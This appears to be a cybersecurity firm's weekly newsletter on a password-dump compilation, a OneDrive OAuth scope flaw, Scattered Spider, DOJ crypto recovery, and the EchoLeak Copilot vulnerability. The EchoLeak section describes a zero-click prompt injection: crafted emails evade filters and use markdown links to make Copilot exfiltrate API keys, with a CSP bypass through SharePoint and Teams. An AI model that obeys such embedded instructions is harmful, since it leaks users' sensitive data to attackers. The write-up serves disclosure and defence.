Cyber Intelligence Weekly

Cyber Intelligence Weekly (June 22, 2025): Our Take on Three Things You Need to Know

By
Posted on Jun 22 / 2025

Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!

To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe

Before we get started on this week’s CIW, I’d like to highlight an upcoming informative webinar that will highlight the changes coming down the pipe with HIPAA.

🔍 HIPAA is changing. Is your organization ready?

Join our experts, Josh Fleming, MSITM and Stephen Dyson, Senior Cybersecurity Managers, as they break down the proposed updates and what they mean for healthcare providers, payers, and partners.

Moderated by Cybersecurity Manager Alyson Pisarcik, this session will cover:

⚫ What’s actually changing and who’s impacted

⚫ Real-world strategies to ease implementation

⚫ Third-party oversight and new contingency planning

⚫ Whether you should prepare now… or wait

Reserve your spot: https://lnkd.in/gfA-Gna6

1.  Massive Password Dump Sparks Panic—But Here’s What You Really Need to Know

In the latest wave of unsettling cybersecurity headlines, reports have emerged of a jaw-dropping 16 billion passwords circulating online—raising alarm bells for users of major platforms like Apple, Google, Facebook, and more. But before jumping to conclusions, a closer look at the findings reveals this isn’t the result of one catastrophic breach, but rather a compilation of over two dozen previously exposed datasets, many of which had already been leaked over time.

Article content

Cybernews, the outlet tracking these exposures, clarified that the leaked data originated from a range of sources: infostealer malware, credential stuffing lists, and rehashed leaks—some old, some new. While the combined total adds up to 16 billion records, the reality is muddier. Many of the exposed passwords are likely duplicates or outdated, and there’s no indication that tech giants like Apple or Google were directly breached. Instead, user credentials associated with those services may have appeared in third-party breaches or malware dumps.

The real concern isn’t a singular event but a growing trend: sensitive login data is increasingly being harvested, repackaged, and shared in ways that expose individuals and organizations alike to serious risk. This reinforces the need for basic but powerful security hygiene—using unique passwords, enabling two-factor authentication, and staying vigilant for signs of account compromise. Security-conscious users can also lean on tools like password managers and breach notification services to stay ahead of potential threats.

For businesses and consumers alike, the takeaway is clear: the threat landscape is shifting from isolated incidents to continuous exposure. The 16 billion-password figure may sound sensational, but it’s just a symptom of a larger, ongoing issue. Proactive defense—not reactive fear—is the best strategy moving forward.

OAuth Flaw: Cloud Access via OneDrive File Picker

A critical security flaw in Microsoft’s OneDrive File Picker—used by numerous third-party apps—has been discovered, potentially exposing users to full-drive data access via overly broad OAuth permissions.

What Went Wrong

The OneDrive File Picker requests scopes like Files.Read.All or Files.ReadWrite.All, inherently granting apps access to the entire user’s OneDrive—even when only a single file selection is intended. The consent UI is misleading, offering users no clear indication of full-drive access versus a single file.

This issue stems from the absence of fine-grained OAuth scopes in Microsoft’s implementation. Unlike Google Drive’s drive.file scope or Dropbox's Chooser, OneDrive lacks file-specific permissions, forcing developers to request global access—even for simple uploads.

Widespread Impact

Hundreds of popular apps, including ChatGPT, Slack, Trello, and ClickUp, are affected. Millions of users could unknowingly have granted these applications blanket access to cloud-stored personal and enterprise data.

Token Handling Risks

The situation worsens due to insecure token practices:

  • Older File Picker versions (6.0–7.2) exposed tokens via URL fragments or localStorage.
  • Version 8.0, which uses MSAL, stores tokens in plaintext in sessionStorage.
  • Use of Refresh Tokens can extend access beyond an hour, increasing exposure if stored insecurely.

Why It Matters

Full-drive access via vague consent can result in:

  • Data leakage of sensitive documents (e.g., tax forms, medical records).
  • Compliance violations in regulated environments.
  • Potential exfiltration via malware or targeted threat campaigns.
  • Blunt API controls, enabling deeper-than-expected access.

Mitigation Recommendations

For Users:

  • Review and revoke third-party app access via Microsoft account privacy settings.
  • Be cautious of any broad data access apps request during upload operations.

For Enterprises:

  • Enforce admin consent or conditional access policies limiting apps to minimal scopes.
  • Monitor Graph API logs and Cloud Access Security Broker (CASB) tools for suspicious full-drive access.

For Developers:

  • Avoid requesting refresh tokens or full Files.ReadWrite.All scopes.
  • Store access tokens securely and minimize their lifespan.
  • Consider using shared view-only links instead of OAuth uploads until secure scope changes are available.

Microsoft’s Position

Microsoft has acknowledged the issue and is evaluating improvements, but no patches or timeline have been announced. The company stated that because users must provide consent, the issue does not meet their threshold for immediate servicing; future updates may refine scope alignment and consent clarity.

2.  Scattered Spider Strikes Again—Insurance Sector Now in the Crosshairs

The cybercriminal group known as Scattered Spider is back in the headlines, shifting its focus from high-end retail to the U.S. insurance industry. According to analysts at Google’s Threat Intelligence Group, multiple recent intrusions targeting insurers bear the unmistakable characteristics of this sophisticated hacking collective. The group, infamous for its tailored social engineering attacks, appears to be ramping up a campaign against companies that manage large volumes of sensitive financial and health data.

Recent victims appear to include Erie Insurance and Philadelphia Insurance Companies, both of which reported operational disruptions following cyber incidents in early June. While neither firm directly attributed the attacks to Scattered Spider, cybersecurity experts believe the timing and methods involved strongly align with the group's typical playbook—namely, impersonating IT staff to manipulate help desks and exploit remote access channels. A prominent Swedish insurer also reportedly suffered a similar fate last week.

Scattered Spider, also tracked under aliases like UNC3944 and 0ktapus, has a reputation for targeting one industry at a time. They were previously behind a wave of retail breaches that affected names like Harrods, Victoria’s Secret, and MGM Resorts. The group uses a mix of social engineering, SIM swapping, and MFA fatigue techniques to gain access before deploying ransomware strains such as DragonForce or Qilin in later stages of compromise.

As insurance firms reckon with rising cyber risk, defenders must double down on identity protections, monitor for privilege abuse, and bolster verification protocols for help desk operations. With the group’s pivot into the insurance vertical, the message is clear: no sector is off limits when it comes to highly organized, psychologically savvy adversaries.

Article content

Critical Zero‑Click Copilot Bug “EchoLeak”: Exposing Sensitive M365 Data

RAIM Security’s research team (Aim Labs) recently disclosed a serious zero‑click vulnerability in Microsoft 365 Copilot, dubbed EchoLeak (CVE‑2025‑32711), which carried a CVSS score of 9.3.

What It Is

EchoLeak allows attackers to execute cross-prompt injection attacks through carefully crafted emails. These emails, phrased to appear as if they’re for the user (not Copilot), bypass filters and deliver specially formatted reference-style markdown links. Copilot, scanning all received emails to generate summaries or previews, can interpret those links and automatically send sensitive context data—like API keys—back to attacker-controlled domains via inserted query parameters. Importantly, this happens without any user clicks or awareness, as the attack leverages Copilot’s automated processing.

Proof-of-Concept

Researchers demonstrated the exploit by prompting Copilot to disclose sensitive content, such as API keys previously written in the user context. They also achieved an image-based leak by embedding image-generation requests; though Microsoft’s CSP protections largely mitigate image exfiltration, researchers bypassed them by chaining through SharePoint and Teams invite flows.

Why it Matters

  • Stealthy: No user interaction required.
  • Bypass effectiveness: Attack evades typical XPIA (cross‑prompt injection attack) filters.
  • Context trust abuse: Leverages Copilot’s propensity to process content automatically and trust its own metadata interpretation.

Microsoft’s Response

  • Released a prompt injection fix in M365 Copilot, deploying it quickly with no end-user intervention needed.
  • Emphasized additional “defense-in-depth” strategies to reinforce mitigation.
  • Confirmed no known customer incidents to date, and attributed the fix to responsible disclosure.

Broader Implications

AIM’s CTO Adir Gruss warns that while implementation varies, similar vulnerabilities could exist across other AI agents. The team has found analogous flaws in additional platforms already.

Key Takeaways for Security Teams:

  • Prompt-injection threats now rival phishing in severity—despite zero user interaction.
  • Email vectors remain powerful attack surfaces for AI-based tools.
  • Automated content processing (tags, previews, summaries) must be treated with the same scrutiny as user actions.
  • AI-specific exploit mitigation such as advanced XPIA filters and heuristic defense are essential.

EchoLeak starkly illustrates how AI-powered workflows can amplify stealth threats—requiring security teams to rethink traditional assumptions and control strategies in Copilot-integrated environments.
 

3.  Feds Move to Reclaim $225M in Crypto Lost to Global Romance and Investment Scams

The U.S. Department of Justice has launched a sweeping legal effort to recover over $225 million in cryptocurrency that was siphoned away from hundreds of victims in a wave of online scams. These sophisticated operations, often disguised as crypto investment opportunities or online relationships, were traced back to organized groups operating out of the Philippines and using identification tied to Vietnamese nationals.

According to a recent civil forfeiture complaint, the scammers used a web of more than 100 crypto wallets and thousands of transactions to obfuscate the trail of stolen funds. With the help of blockchain analytics, investigators from the FBI and U.S. Secret Service linked the activity to victims across the U.S., including in states like Texas, Arizona, and California. One of the most high-profile victims was Shan Hanes, a former Kansas bank CEO now serving a 24-year sentence for embezzling tens of millions—funds he later lost to one of these scams.

The crypto exchange OKX first raised red flags back in 2022, leading law enforcement to a broader scheme involving a network of “scam compounds.” Many of the accounts were registered using similar email formats, accessed via Philippine-based IPs, and verified with photos that appeared to be taken in a single location. Authorities believe these operations lured job applicants with Mandarin-speaking skills to the Philippines under false pretenses, recruiting them into criminal enterprises.

This case highlights a growing trend: law enforcement agencies are becoming more effective at untangling blockchain obfuscation and holding international fraud rings accountable. While many victims may never fully recoup their losses, the DOJ's action marks a significant step forward in turning the tide against cryptocurrency-enabled confidence scams.

Thanks for reading!

About us: Echelon is a full-service cybersecurity consultancy that offers wholistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about

Are you ready to get started?